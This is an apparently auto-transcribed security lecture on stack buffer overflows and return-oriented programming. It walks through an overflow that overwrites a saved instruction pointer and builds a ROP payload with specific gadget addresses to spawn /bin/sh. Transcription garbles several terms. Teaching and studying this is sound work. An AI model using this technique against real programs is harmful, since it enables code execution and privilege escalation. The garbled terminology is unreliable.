 Alright folks, I hope you all made progress on assignment 7, let's see, oh, final next week, everyone stoked, last week a class, also excited, not as excited, okay, cool, alright, let's finish off, we're going to finish off, yeah, yes, yes, yes, today, cool, okay, so let's go over, so now we're going to finish out application security by really digging in and understanding what goes on when a buffer overflow occurs, so, somebody remind me what is the seed deck calling convention, you know this close to the final, the less answers I get and more difficult the exam gets, what is the seed deck calling convention, some of you remind us, what are this rough order of steps involved, so primes on the stack from right to left and then, the address of the next instruction, where does that address usually come from, yes, but where does it come from, like what assembly instruction usually pushes that onto the stack, the call instruction, exactly, cool, and then what is the caller doing, somebody else, so the function, or the call lead, the function that got called, save the base pointer and then what, it also allocates space for local variables and then once it's done, undoes that, pops off, the base pointer replaces the save base pointer, so we essentially, when we call a function, essentially two of our registers are saved onto the stack, one is the base pointer, so we have saveTVP and then we also have saveEIP, right, of where we're going to come back to when we're done executing and fundamentally nothing, so again, think about, so memory, are there any restrictions on your program of what memory on the stack it can read and write to, no why not, because there's not, it's a stack that needs to read and write, it's literally, we started it off with stack is the kind of scratch memory for your program, it needs to be able to read and write for that, yeah. So the question was how do you change, so the basic, so you're talking about call by reference or call by value, so essentially the compiler, you can think of it as call by reference, basically the pointer is pushed onto the stack as an argument and then when you change that, you dereference that pointer, so that's why it gets changed, pass by value means the actual value gets copied, that's why that function gets a fresh copy of that and it changes you make, doesn't probably get that, so it's actually very similar, I mean, because again, x86 doesn't have any of these concepts, right, a pass by reference, pass by value, so the compiler has to trick you into thinking that that's what happened based on how it compiles that function, so similar thing in like Java, right, Java, do you ever think about pointers? No, but do pointers essentially exist in Java? Yeah, right, you've ever passed an object into a function and then that function either changed the field of your object or called parameters on your object, right, it's essentially a pass by, some sense of pass by reference type thing, but under the hood it's just passing a pointer to that object or some of the hood, cool. Okay, so what would happen if somebody, if an attacker is able to control the saved instruction pointer that's on our stack? What could they theoretically do, yeah? You could change where the program continues to have the function. Right, it's important to remember, once a function's called at the very end, the return instruction essentially says whatever the saved instruction pointer was on the stack, start executing code from there. There's nothing that says start executing code from the instruction that called me because that information is stored on the stack, yeah. Yeah, maybe with the, by changing EVP we may be able to change the base pointer that's set when we return, so we may be able to move, essentially move our function frame around, which is pretty cool. So let's look through an example of this. So here I have a very simple function called my copy, so what, what is my copy doing? What are the semantics of that function? Yeah, so it takes a character pointer argument, it says a pointer to some character array, and it's going to copy that on the foo, what is foo? Yeah, four character buffer array that's on the stack, so we know it's a local variable to allocate it on the stack. What are the semantics of string copy? I think string copy keeps going until it sees a non-terminator. Yeah, so copy all the characters from string into foo, right, these are just pointers, so they're pointers to memory regions. Copy one, well first test, does string point to a null byte? If it points to a null byte, what does that mean? Why does it stop? Then a string, right, so in C, a character pointer is a series of alphanumeric characters followed by a zero, like a null byte. So basically test is the character we're pointing to null, if it is stop, if it's not copy that to where foo points, and then increment each pointer by one and keep doing the same thing, so just copy over, so is there anything? So how does string copy know that the buffer foo only has four bytes allocated for it? It doesn't, it doesn't have any way of knowing. No, so fundamentally, we'll get into this in a bit, but fundamentally string copy, if you control the source string and can make that as big a size as you want, there's no possible way for the programmer to tell string copy only copy four bytes from the string as foo. How would somebody have to do that? So how could you do this safely and use string copy? Yeah, so maybe you could write your own for loop, but what do you have to keep in mind to be spear gap? So you can maybe use a different function string and copy that only copies four bytes because you know the size of foo. What else could you do if you were dead determined to use string copy? Yeah, check the length of the string, right, because you know, so if a string copy is, if string length of str variable is greater than four, then throw an error or return null or whatever you're gonna do to signify that that does not work. Then we have our main function and our main function, we're gonna copy pass a string into my copy, we're gonna print out after, we're gonna return zero. So this is a tip I guess if you're ever making slides for anything, don't put the date or a specific class number in here because I can reuse these many times since. So then we have to look at then what's the assembly code of this function. So we can look, we can see that main, so what is the first thing that main has to do? Store the base pointer, right, it goes back to the calling convention. Main must store its base pointer, the base pointer of whoever called it. So first push EEP to store the same base pointer on the stack. Let's think for a minute, right when main is called, where, what's currently on the stack would be below the stack. What is, if we were to draw the stack diagram, what is the stack currently pointing to when main is called? How do we get to that function? Close address of main? Sorry, I couldn't hear you, push EEP. Yeah. We haven't pushed the base pointer on the stack yet, so let's, I'll bring this up here. Let's say we are right before this instruction push EEP, we're pointing here, somebody has called us. So what's on the stack right now? Yeah, or very close, the save instruction pointer, right, the address of where we should go after main is called. Every function that must be there because we're going to return and we're going to jump to whatever that is on the stack at this point. It's just a helpful double check. So we're going to first push EEP, we're going to set up our base pointer, moving the stack pointer into base pointer. We're then going to subtract 16x from the stack pointer. We're then going to move some constant value 8048504 onto the stack pointer. What's this value? Address of the function? No, not quite. I mean, I guess theoretically it could be, but it's not, yeah. Yeah, what's the parameter? Yeah, but what is that? The address of the string? Yes, it's the address of the string, perfect. I guess it would help if we looked at the next line and just call my copy so we can see that that's where that address is, right? So we're passing in essentially a character pointer, right? We can look at the function signature of my copy. My copy takes in a character pointer. Why is it this value 8048504? Yeah, it's where the compiler decided to store the string, right? Here we have this constant string. We've decided somewhere in memory of where to store this, so the compiler says, I'm just going to pick a memory place that's at that place. So there's a little bit more of how this is actually specified and alphanage and all that stuff, but essentially it doesn't really matter. We know that when this program loads, so what's going to be the byte that is at 8048504? Yeah, the hex representation of A, right? And then plus one from that will be the hex representation of S, and plus one from that will be the hex representation of U, and so on, right? So this is essentially the compiler needs to store this string somewhere, yeah? So that hex value there is pretty much always going to change every time they're programming. There's nothing valuable from it authentically? Yeah, I'd say it won't change every time you run, but every time you compile the program it could decide to put it in a different order or wherever. So yeah, essentially this is, in some sense, arbitrary. Accept that for our program to be correct. These bytes must be at that memory location. Yeah. The memory address is like local to the memory given to the program. Is it like universal, that number? Local, local. So every process has its own view of memory. So for every process we know it has tricks into thinking it has full access from 0 to FFM. Got it, okay. So then, okay, so we call this function and what must happen after this? Looking at the C code of the name. Why don't we jump to where we're, let's assume my copy returns, right? What's the next thing that has to happen in this function? Do we do anything with the return value of my copy? We call the print set function, I'm passing the parameter a string pointing to after, which probably is very similar to this. And then we return 0. Should be another move into EAX, this time moving EAX onto the stack. Why it chose to do this differently than the other one? I have absolutely no idea yet. But we do this, so we're moving 804, 8517. What is that? 804, 8517. That's a pointer to the string after. The string after is just the bytes A and FD are 0. So there's a null byte, you know there must be a null byte at the end. Then we call print F, stuff happens. Then we move 0 into EAX, leave and return. So this is all the functionality of this function name compiled. Good. Which registers do we return access? Leave. Good question for the class. So what does leave do? It pulls up the instruction pointer for the stack. Return does that, what about leave? Get ready to leave, right? So leave, so until we remember we're executing some function, we have the base pointer pointing somewhere up a little bit higher. We have the stack pointer has moved down to allocate memory for the stack. So what leave does is undo all of that. So it sets the, let me show you this, right? It's setting the copying the base pointer into the stack pointer to move the stack pointer up where the base pointer is. At that moment we are pointing to the saved base pointer and then it does a pop EDP to reset the base pointer up. And then return goes to, and then return essentially pops the saved instruction pointer off the stack into the IP. Which is the one that we just put up there, right? Leave, move the stack pointer to point to it. We'll walk through all this code. That leave essentially undoes these three instructions. So the push EDP, the move ESP into EDP and the move subtract, hex 10 from ESP. Okay, so then what about my copy? What does it need to do? Yeah, first thing doesn't need to push EDP, right? It got called, it does no idea from where. So it needs to store the base pointer if ever called it. It needs to move the stack pointer into the base pointer. It then subtracts now 28 hex from the stack pointer. Then it needs to call string copy. So the arguments from right to left are going to be placed onto the stack. So we have move EDP plus 8 into EAX. So it's EBP plus 8, which the string STR, so this is the argument, right? So from the base pointer, negative offsets are local variables and positive offsets are arguments. So this is actually picking up this value that's placed right here into ESP. And it's copying that into EAX. It then moves that from EAX into ESP plus 4. So moving that value onto the stack, then it needs to move, now it's loading effective address. So it calculates what is EBP minus C into EAX. What's EBP minus C? That's foo. Yeah, so that's why the compiler decided to put foo. So it put it at hex, C beneath EBP. And then we move that onto the stack pointer and we call string copy. So we've set up on the stack. Going up from the stack is the string foo, so pointer onto the stack. And above that is our argument. So we call that. And then we don't need to do anything with our return value, so we just leave it in return. All right, should we walk through this? So we see what happens when we run this. Cool. So four registers this time. We have the code. So the code, just grab the compiler and decide to lay out the code. We have our stack. The stack pointer currently points to FD2D4. And the base pointer is currently FD2E0. And EIP is right at this. So this means this is the next instruction to be executed. So first instruction happens. What happens? Push EBP. So we're pushing the value of EBP on the stack. The stack pointer goes down. We've now saved the base pointer. Move the stack pointer into the base pointer. So now we're setting up our base pointer for main. Subtract X10 from ESP. I don't know where our base pointer is. You can imagine there's another arrow. For a stack, if I had FD2C0, then we're moving... So what was this? So what was this 80480504? Yeah, that's the address of our string, that long string we had. Yeah, it's making room for... So main did not have any local arguments, but main is calling a function. So it's deciding to get us 16 bytes there for our local stack. And then it's going to copy this value onto the stack so that it can call this function. Just because... Yeah, compilers do things for lots of reasons. I think it's one of these things of it needs to store four bytes on the stack at least, but that's a weird offset, so it does 16 bytes. Alright, so we move this value onto the stack. So now as a caller, based on the calling dimension, we've done everything we need to do to set everything up. We've placed the argument to the function on the stack. Now we need to call it. What happens... What does this call instruction do? So call jumps to 804803F4, and what else pushes what of the stack? Very close. Not the address of my copy. The address after my copy is exactly 80480423, the address after this call. Right? Essentially this is the breadcrumb. We need to call a function. We need to know how to go backwards. Where to go after this function starts executing. So we call my copy. We push 80480423 onto the stack, which is this instruction here, the one right after the call to my copy. So this is, again, now we're in a situation, new function just got called, my copy, and again we can see visually in this example that where the stack pointer is currently pointing is exactly to the return address. Save instruction pointer. So what does my copy do? Push the key. So saving main's base pointer onto the stack. So we have going bottom up, we have the save base pointer, and then the save instruction pointer. And then above that the argument to the function. Then we move the stack pointer into the base pointer to set up our base pointer. We need a bunch more room, so we need, we then subtract 28x from ESP. Again, another example, why 28x? I have no idea. Because I decided to do that. How much space did it need for our buffer? Four bytes, right? It was a four byte buffer, but it just decided to give us 28 bytes, and I decided to put it at, let's see, 12. Yeah, so 12 bytes below. All right, so what's the EDP plus 8? The address of the string, which to my copy is the argument of the function, right? And why is it EDP plus 8? Yeah, because there's, exactly. There's the save base pointer and then the save instruction pointer. So at EDP is the save base pointer, at EDP plus 4 is the save instruction pointer, and at EDP plus 8 is the first argument. And then for me on that, EDP plus 12 would be the second argument, third argument, fourth argument. Yeah. Where does that base pointer come from again? Where's that pointing through? Is that what's called main? This base pointer? Yeah. Yeah, this is, this, okay, so this base pointer is main space pointer. So fd2d0 is here, or, yeah, is here? Should be above that, it should be here. I'm not going to throw anything to this one. I was going to say that before. Let's walk back slightly. Okay, I must have messed that up. But anyways, no, no, no, that's right, that's right. Yeah, yeah, this is fd2d4, this is fd2d0. Okay, yes. Question again? That's right. Okay, then this base pointer is the base pointer of the function that called main. Okay. Kind of keeps going up. You could walk this to figure it out. Okay, so we've moved EDP plus 8 into EAX. We move EAX into ESP plus 4. What's the difference between the move EDP plus 8 and the, into EAX and the load effective address of EDP minus C into EAX? What did the move instruction do? So what does this do? Do you think the value is stored at that position? Yes. The second is just like calculating the sum of this EDP. So again, it comes back with pointers, right? Another way to think about this is a pointer dereference. So here, it's essentially calculate EDP plus 8. Whenever that memory location is, dereference that, grab that value and copy it into EAX. Right, so another way like we said, was move the data stored at EDP plus 8 into EAX. Right, so literally copy those bytes here to here and then copy that onto the stack. Then what is this load effective address doing? Yeah, so a load effective address essentially means compute the address, but don't dereference it. So what is EDP minus C? EDP minus C is FD2AC, move that value, not the memory that's stored there, into EAX. So after we do this, EAX will have the value of FD2AC. That make sense? Then we move that onto the stack. So we have FD2AC on the stack and then 804, 8504 above that. So we essentially push onto the stack all the arguments to string copy from right to left. So load effective address. So it just basically says calculate EDP minus C and move it into EAX. So the value of EDP minus C, not, don't do a dereference. So this is move, so EDP, so it just calculates what is EDP minus C? Well that's FD2AC, move that into EAX and then move that onto the stack. So we're about to call string copy. What's gonna happen? So the call is going to push, yeah, it's going to push the address of the leave instruction, so 804, 84, 0C onto the stack. String copy is going to do what it does, but what is it going to do? So what it like, we talk about what string copy does, what is it going to do here? Yeah, that even basically seems smarter than it is, right? So all it's going to do is dereference 804, 8504, grab a byte and copy it to FD2AC and then increment by one, so then copy the next byte from 804, 8505 into FD2AB and just keep going until it hits an old byte from this, right? So yeah, when it does that, does it do that going, like so if you over-ridden bound, would that go further down the stack or up the stack? Or if you had it too long? So a string is points to, let's see, the string points to the data and then you increment it by one to get to the next element. So where does going plus one go in this stack? So we write up, which means if you start writing up at FD2AC, how many bytes do you need to write before you get to the same base pointer? Okay, say about this, what is each of these squares? Four bytes? So four bytes, so write four bytes, get here, write four bytes, get here, write four bytes and now you're starting to overwrite the same base pointer. So C, what was, so actually this is very nice because we already have, we know it's actually C bytes below because we have this load effective address of EVP minus C. So we know that from that buffer there are 12 bytes between that buffer and the same base pointer, which is at EVP. Does that make sense? It is the caller's responsibility to, is the caller's responsibility to make sure that the stack is consistent when it returns. So basically, so the parameters are still on the stack. Yes, like, so right after this call string copy, the stack will be exactly at this location where we left it. So these parameters will definitely still be there on the stack. That is one, one thing we can do is overwrite that base pointer and then what's four bytes above the base pointer, the instruction pointer. What happens if we overwrite that instruction pointer? Yeah, we can make the program go wherever we want, where specifically. So the string copy go wherever we want, like what instruction here makes it go wherever we want. Which return there's to? The return of my copy, yeah, the return of my copy, this, this instruction here, this ret instruction, if we're able to alter that same instruction pointer on the stack is 804-8423. We can make it point to and go wherever we want. And that's the one above the base pointer or the base pointer? This is the one above the base pointer. So this is the base pointer here at FD2B8 and four above that, the same EXE exactly. So the same instruction pointer, if we're able to alter that, we can go anywhere we want. Yeah. Quick question. That's C and load effective address. Is that arbitrary as well? Yes, it needs to be at least four bytes. So that's the other thing that's slightly surprising about this is why didn't the compiler decide it at EVP-4? It could totally do that for whatever reason it decided EVP-C. But this is actually the important thing of why it's really important to look at the assemble. Because if you just looked at this C code, you may say, oh, there's only four bytes to overflow to get to the saved base pointer. I'm just going to overflow 12 bytes because that would overwrite the four bytes, the saved base pointer, and then the saved instruction pointer. You do that, you find out it doesn't work and you don't understand why. You have to actually look at the code here. Exactly. So you need at least 12 bytes to get to the saved base pointer and then the saved instruction pointer. Okay. So it always allocates a little more? I wouldn't say always, but it often does. Okay. Because if you've allocated 12 bytes, I think it would still put it at exactly the same space. Maybe. There's also a lot of compiler options you can specify that change these things. So okay, so then let's look through what happens at string copy. So what does the memory look like? Well, what does string copy do? Again, to remind us at 8048504 is this string. So this means it's copying FD2AC, it's going to be ASU space. Now, this is the weird thing is again, because of endianness, if we view this as an integer, the space is the largest and the A is the smallest byte, even though the A is the value you wrote first. So it's essentially backwards than what we would expect. Going up, CSE space, again, the same thing, interpreting that as an integer. Does it matter what these 12 bytes are? Kind of. Kind of, no. What if there's a null byte in there? You can't let it enter. Yeah. So if there's a null byte in here, then it will stop and it won't copy any more bytes. This can be tricky. This is why I keep harping if you come to outside or whatever about what does the man page say the specific semantics of this function are because sometimes when you're doing these things, if your input has a new line in it, then some functions breed up to a new line. So you actually won't get in enough data for a new line. Null bytes are also very new. And we keep going. So then we fall, F-A-L-L. And now, so now we've overwritten the saved base pointer. Does the program crash at this point? We've overwritten a buffer. Shouldn't the program crash? Yeah, because this is memory that it can read and write to, right? It has permissions to read and write to all of this memory on the stack. It can keep going all the way up. At some point, you will run out of stack space and you will cause the stack to fall just by writing. But from our little example here, that will definitely not happen. It'll keep going, overwriting the saved instruction pointer on the stack and then overwriting the argument above that and keep going up all the way until it hits a null byte. The one thing I did not mention here that definitely happens is the null byte is also copied. So technically there will be a null byte here. It can get into, you know, effects things sometimes. But the one we're targeting is the instruction pointer. That's the one we want to write. It's the easiest to bend the control flow, yes, to your will and change where it wants to go. Okay, so now my copy returns. Does my copy know that its stack has been messed with? No, what does it do? It does whatever these instructions say it should do, right? There's no additional checking everything to understand exactly what's happening is containing these assembly instructions. So we have leave. What does leave do? It copies the stack pointer into the base pointer. So it sets the base pointer pointing to the stack pointer and then there's a copy So essentially what should happen is the base pointer should get the value 6C, 6C, 6166. Does that crash anything? No, when would it crash something? So let's say if we tried to dereference something, exactly. So if we had another instruction somewhere after this that said dereference the base pointer and then grab something, this memory region is likely unmapped and so we'll get a seg fault because we tried to access some memory that's unmapped. So now we go return, now what happens? Yeah, so now we do a pop EIP, right? So we're going to try to start executing from 3.1.3.0.3.2.2.0 and that will crash the program, that will pop the seg fault. So if you do this you'll see, so running this with GCC, this example, running 8.0.0 we'll see that familiar seg fault core dump and then if you GDB and debug this you will see that it received a seg fault and specifically at 3.1.3.2.2.0 so it tried to access that and could not. And looking at the registers we can see that the registers actually have EDP as 60, 60, 61, 66 and EIP as 3.1.3.2.2.0. So let's say so question one where did this string come from? That's also the core dumps are actually very nice because you can load in a core dump of a program that's not even running and look at the registers in the state of the program at the moment that it crashed. So where did this string come from? Yeah. Exactly, it's hard coded. We as a developer coded that string up. What if that string came from an argument variable? Yeah, then the user or an attacker essentially controls it and what registers can they then control? Yeah, EIP, what else? EDP. And EDP, right? Cool, so going back for a second here, so yeah. So like we might be able to, but return I remember from last class would pop the return value of that function to the instruction. But there is no return value here so what do we do? No, no, no, so the return value itself is put into EAS. The return instruction pops whatever the stack is currently pointing to into EIP, the instruction pointer. So basically this go jump to wherever the stack, whatever value is currently on the stack, which in this case, yes, which should have been the next instruction of the function that called us, right? So in this case, it should have been this value 8048423. So then what so where could we go in this program? Anywhere, we could go, we could actually just make this program jump back to main and then have it do this again and it would loop forever. We could have it go to my copy and copy more stuff and probably crash at some point because the pointers are really messed up at that point. But we don't have to do that. We can actually, we can actually jump to any of these addresses and technically we can jump to even essentially between an instruction. So you see here there's a, how many bytes is this? I can't do this math. I don't know, a lot of bytes in between here. You're going to try and jump to in between these instructions, be together to instructions to make something that might or might not be an instruction. Exactly, exactly. So if there were, let's say a function that would set you at, I don't know, if there's, let's say an admin function, if there's an admin functionality that when you called it gave you access as an admin, all you have to do is change this save instruction pointer on the stack to go to that function. And then as soon as my copy returns, it would then start executing that function. Yeah. Can you only jump to memory locations that are already out of this program? Can you jump to anywhere in their RAM pretty much? So technically you can jump to anywhere in RAM. It gets slightly more complicated as I'm ignoring it a little bit for now of the different permissions of memory regions. So typical memory regions have either read, write, or execute permissions. So for instance, it used to be that you could actually, the stack itself was executable. So you could essentially write assembly instructions onto the stack and jump back onto the stack itself to start executing code of your choosing. Crappy IoT devices are still done this way, like for terrible reasons. Most modern systems will disable the stack being executable. So we're actually going to go over a second, how to go beyond that. Yes, in an example, so one way of doing this, so if we can execute code of our choosing, then great. Oftentimes now that that is not feasible to do. So we need, and you can, there's plenty of resources and techniques, so I'm learning how to do shell code and all this other stuff to actually do that. But for right now, we're going to ignore that. No, so usually the instructions are read only, read and execute and not writeable. So the entire concept is reading and, sorry, writing and executing are exclusive. So a memory region can either be writeable or executable, but never both. And so this helps prevent things, but we'll see super clever ways around that. But first I want to talk about different types of functions that are essentially vulnerable by default. So that specifically gets, so gets reads from standard input until it gets to, I believe, a new line and sends that into a buffer, but it has literally no new lines and no end of file. But this is a 100% dangerous function that literally is impossible to do get safely. Because you can't tell gets how many, how many in a copy. String copy, string cat, sprintf, so printing into a string, scanf, custom input routines. But now we need to go about how to exploit this. So once you control the instruction pointer, you can then turn that into arbitrary code execution. There is actually this great paper called, Smashing the Stack with Fun and Profit, if you want to learn about this folder style of shell code jumping through an executable stack, all this fun stuff. And the goal is we essentially want to write some code. So our high level goal as an attacker is to do what? What do we want to do? Yeah, we want to make, in some sense, make the program do something that it's not supposed to do based on its security policy. Going all the way back to the beginning, the program should do something. It has basically a security policy of things that it should do. We're trying to make it violate its security policy. So that could be for a setUID program that is setUID root. That is, we want to trick it into doing stuff that we want it to do. Maybe we want it to add us to a level or a group or something. Because, so what we want is, in some sense, we want that program to execute code of our choosing, right? Because the program has its functionality, it's defining code. We want to trick it to doing whatever we want it to do because this code now has the same privilege as the application. So one type of thing we really want to do is just call binsh. So this is where the term shell code comes in. We want some code to execute a shell binsh so that we can do whatever commands we want to do as the permissions of that user. Really, it's just assembly code to perform a specific purpose. So we can write some assembly code. We can write it very carefully so that has no nulls, no new lines. There's plenty of resources for that if you want to get into that. But as I mentioned, the problem of injecting our code is the question was where, right? So if we have code that we want to write, where do we execute that code? Or where do we put that code? If the program has the correct memory permissions such that nothing is both writable and executable, that means we can't write to anything that is executable, we can't inject our code anywhere. So this brings up a super cool exploitation technique called return-oriented programming which is kind of getting close and close to the pinnacle of what kind of modern exploitation is. The idea is, so as we talked about, so we talked about one way would be to call a function, right? If there's a, and actually, so, going back a bit. So we said we could call a function, right? So we can put the save instruction pointer point it to another function. That way the return will go to that function. Where does that function get its arguments? What was it? Yeah, where does a function that is called get its arguments from? Yeah, so it gets it from the base pointer, right? So this example of my copy, evp plus 8, evp comes from the stack pointer, right? Everything's on the stack. Who controls the stack in this case? We've completely changed the stack, right? The contents of the stack. So not only can we decide what functions get called, we can actually change the arguments to those functions to other things that we want to have happen. And so, and this is, we can also, one of the cool things is this technique called return to libc, which basically says, okay, maybe I can just reuse libc. libc has this nice function called system. I can just jump to system and pass the argument bnsh. And then at that point, I've executed a shell and I've reused the code of the application. I'm not using any of my own code. Return order to programming goes a little bit farther and says, what if we essentially execute just little snippets of code that by combining them in a crazy way actually does what we want to do. So we'll walk through this. I was introduced in 2005, so it's an old-ish technique, but it's much newer than the separate document. There's a really cool paper here. It's called the Geometry of Innocent Flesh on the Mones, the super cool title of the paper. Return into libc without function calls. Okay, so let's look at an example. I think this will help. So main function, a buffer foo, a copy of argv1 onto foo, return 10. Easy? Simple? Simple program. We don't even have any other functions we're going to call. Is this vulnerable? Yes. Why? Because string copy, specifically with arguments that an attacker controls, right? So a string copy by itself is not always vulnerable. It depends on if the attacker can give inputs that's bigger than the buffer, then it can trigger a buffer overflow. So what's the first instruction of main? Push A, B, P. Awesome. Then set up our base pointer, move stack pointer to the base pointer, subtract 3C from ESP, move EVP plus C into EAX. What's EVP plus C? What's EVP plus 8? The first argument, EVP plus 8 is the first argument in this case is argc. So EVP plus C is argv. Then we add 4 to EAX. Why do we add 4? Index 1. Yeah, so we're getting argv as a pointer. We're indexing 1 into that array. So that's adding 4. And then we're dereferencing that by moving wherever that points into EAX. So this finally gets us to a pointer to the string that was passed in as the argv. Then we move that onto the stack pointer. We then load the effective address of EVP minus 32. Is 32 50? Yeah, so here it did exactly the amount of space that needed. Then move EAX into ESP, call string copy, move 10 into EAX, leave and return. So this is this. We can compile this. We can look at this. So one thing different here about the other compilations is we're using the dash static option. So what is that? Not quite. That's a no PID, I believe, which you may also need for this, but yeah. Yes, so libc, right? Libc is a bunch of code. It's a library function. Normally when you call a library function, it is dynamically loaded into your process, your application. But statically, it's compiling all that code into one. So all of libc is included here because we need this string copy function. And we can see that it's 716 kilobytes of data, which is a lot of data. But this has, hey guys, we won't get into it. It has a lot of nice properties. But we assume the program is compiled like this. We can then, okay, so we need to first find little bits of gadgets in the program that we can reuse and essentially encode our shellcode idea of calling system or exactly ebinsh. So we want to invoke binsh. And so what do we need to do that? We look at system calls with x86. So to call execve, we need the value of b in eax. That's execve. We need the address of a string binsh into ebx. We need the address of an array that is the address of binsh and then null in ecx. And finally, we need null in ebx. But we need to figure out where to put binsh. So we need the string binsh somewhere in memory. For the read-alth command, you can use to look at a binary and this will give you this nice ridiculous table that don't let it scare you. It shows you all the different memory areas of the program and what their permissions are. So the thing we're interested in here is this column, the flg, the flag column. So the x are executable, the w is writable. So we need something that's writable. So let's say we are going to target this .data section. So the nice thing about this is it says that the way this is address 0808060 at that memory address will be writable memory. So if we can write the string binsh there, now we've got that string somewhere in memory. So we're going to use this information to store in our pocket as we look at this file. So okay, if we need to write this string binsh somewhere, we need some gadget that will write some data into memory and then return. So we're going to search, we will find a gadget that if we jump to and if we set save eid to 809a67d, these two instructions happen. So what happens here? So what are the semantics of this little gadget? So what's the first instruction? Let's move eax ebx for ebx. Yeah, very close. Move the value of eax where? What do those parentheses mean? And the memory pointed to by ebx. Yeah, so if there's a memory address in ebx, then we will copy whatever's in eax into ebx and then return. Name's very simple, yeah. So without parentheses, if the value 10 is in eax, we will copy 10 into ebx. So after that instruction executes, the ebx register will have the exact same value as eax. If with the parentheses like this, we are going to dereference ebx. So we're going to say whatever ebx points to, so it points to some memory region, we will copy 10 into that memory region. So the value that eax, the ebx register does not change, the memory that ebx points to changes. So this allows us to change essentially. So if we assume we can control eax and ebx, we can now write to whatever we want in memory. So assume for now, we'll show how we can get there, but assume for now, we can control the eax register, we can control the edx register, and we know we can control the instruction pointer, so we can force the instruction pointer to go here. So if we assume we have eax and edx, we can write a value somewhere in memory, and then what will happen in this return? What does the return do? Yeah, it sets the instruction pointer to be whatever the value is on the stack at that point. Who controls the stack on a buffer overflow? We do. We do, the attacker. This means that after this little gadget happens, we can make it go wherever else we want, maybe to another gadget that does something. So let's see how we can. So we could do something very nice. So let's say what if we have the register eax be the data slash bin. So slash bin, if we have here, sorry, edx be the address of data, 080 ea 060. Then after we execute this gadget, we will copy slash bin to this memory location. So we're trying to build up and be able to write the string slash bin slash sh. So we need more gadgets. We can't control edx yet. We can't control edx. We need something else. So we need to get our data into edx. It turns out there's a very nice instruction. Pop edx. Pop does what? It takes the value off the stack and moves into that register. Who controls the stack? We control the stack. So now we can put whatever value we want onto the stack, call this gadget, it will pop that value off the stack into edx followed by a return, where it will then go wherever we want after that fact. So using this, now we can control edx. So we can set up and put whatever value we want in edx. We need another gadget to put whatever we want in edx and now we're able to write anything wherever we want. So let's look at what happens just as a little example. So now we're going to run this program. We're going to pass in 50 a's by 50. The buffer. So that gives us the buffer and then one of the next four bytes. Yeah, what is that going to be overriding? The base pointer and then the next four? It's the instruction pointer. Why is this backwards? Yeah, because it's a little indian. So this means I'm going to go to 0806E918. So that's I've spoken right in the same return address. And then what's this next thing on the stack? This will be whatever we put into edx. So this gadget, this was uh, let's go back slightly. Yeah, so this is this address. So we're showing how one gadget works. So when we run this, we'll get essentially to this point of the program. So it's essentially exactly the same as we have before the string copy everything. So we have overwritten the 50 a's from our buffer, right? So that was already put 50 a's. Then we overwrote the saved base pointer 65, 64, 63, 62. And then we overwrote 0806E918. And then what was that for the reverse of that? So 62, 63, 64, 65. So string copy happens and we know that nothing crashes here. We've just overwritten memory. So we'll walk through these last instructions here. Moving 10 into edx, a leave will again move the stack pointer into the base pointer and then do a pop EVP. So the base pointer is now 65, 64, 63, 62, our value that we passed in. And what's so is it going to crash on this return? Why not? This is an actual address that is executable. So it's a real address in the program. It is executable. So we return from here. We're going to start executing there. Does the program know that it's now executing some weird function halfway through a function in libc? No, all it cares about is just executing these things. So now it's going to do pop edx. So what's going to happen? 62, 63, 64, 65 goes into edx. And then it's going to return. Where's it going to return to? Yeah, it's going to return. So here, this was the second argument. So this was the argument here. So essentially, we have a gadget here that when we call it will put whatever the next value is into edx. And then we'll jump to whatever the instruction we put after that, whatever address is after that. So with this gadget of pop edx return, we can put the value to edx. Now we need a gadget to put our data into eax. It turns out there's a really nice gadget at 08, 0B, b6, b6 of pop eax return. And there's a lot of other gadgets. So we need to control what registers that edx register to call exec ve. We need to control the ecx register. We need to, so we'll see there's other things that will come in handy of clearing out eax. So x already registered with itself. We'll clear it out, incrementing our register, and finally calling it in 80. So we need to call it in 80 to call a sys call that calls into the system. So now we can actually use this to completely build up our shell code. So we can keep doing this, but this gets kind of insane writing it like this. So there are tools and better ways. So we can actually write this as a Python script. So without using anything fancy, all we're using is the struct module to be able to tell Python that we want certain things in little or big So we're going to create our payload, so our payload p. So we're going to first have 50 a's and then bcde. So where is that? So that's going to be our input as rv1 to this program. So what is that overflow going to do? Yeah, so it's going to chain first just 50 a's and then the base pointer bcde. And now we need to copy slash bin to dot data. So we already saw this, we're going to, now we're appending to p our payload. We're going to pack, this is, again you're going to ignore the Python syntax. This pack means turn this number into little indian, so we don't have to do that anymore. This is the nice thing about doing this. And so we're going to call this gadget. We have a nice comment here that tells us exactly what this gadget is, pop edx return. What do we want to mean edx? The address of dot data. So we're going to first copy in the string slash bin into dot data. So this is the address of data that we learned from looking at the elf header. Now we need to control eax because we need the string slash bin there. So again remember as we saw, so just like before whatever is after this on the stack is where this gadget's going to go return and execute from. And we control the stack. So now we can make it go to pop eax return, which will take whatever the next argument is in this case slash bin which is what we want. And it will move that into eax. Now at this point we will have the string, we will have the value in the eax register will be slash bin, that string. And the value inside edx will be the address of dot data. So now when we call our gadget to copy eax into wherever edx is pointing to, that will actually change the memory of the program and write the value slash bi. Does this make sense? We need to do something. So now we need to copy, yeah. So I understand up until where we overrun the basic pointer and we feed in a set of, you know, an address that's actually executable. Yes. So now we are doing it. We're essentially reusing little tiny bits of code to do things that we want it to do. And sorry, it's the other important thing is each of these little bits of code is re, is using values onto the stack, getting them into registers because we control the stack. So we've already moved, you know, eax into eax. At this point right here. So these, essentially these little three, four, five lines are all about doing that. Yeah. And so what's in eax? So in eax is, so the way to essentially read this is this will pop whatever the next value is into eax. So this will pop slash bin into eax. So we need the string slash bin slash sh somewhere in memory because we want to call exec ve with a pointer to that string. So we're using this fixed memory with location because we saw in the elf header that essentially global variables are always stored at this location. So we know this is a fixed memory location that never changes so we can store our data there. So what we're trying to do is get the string slash bin slash sh into memory. We have a little bit of a problem because if we did slash sh zero, we have a null byte. So we're gonna use a nice trick of adding an extra slash to our sh. Sure. So our string will technically be slash bin slash slash sh. Luckily, the OS doesn't care about that at all and all these extra slashes are redundant. So again, and we can see we need in order to copy this value into the address of data plus four. So what's currently at data is slash bin. So now we want to write to four plus that we want to write the rest of our string there. We need essentially same five lines again but changed so that we call the same gadget of pop edx return. And we need to pass in there the address of data plus four pop edx return slash slash sh. And now into this gadget to now copy that. So these five bytes, if you think of it as atomically, essentially says copy the string slash slash sh into the address of data plus four. So we've already copied bin to that data. So if I using the pointer to dot data, we have the string slash bin slash slash sh. And now we need to zero out the data on that. Yeah, so now we need to put the null. Exactly. So that's what we're gonna do right here. So this is zeroing out the address of data plus eight. So we're going to set edx to be the 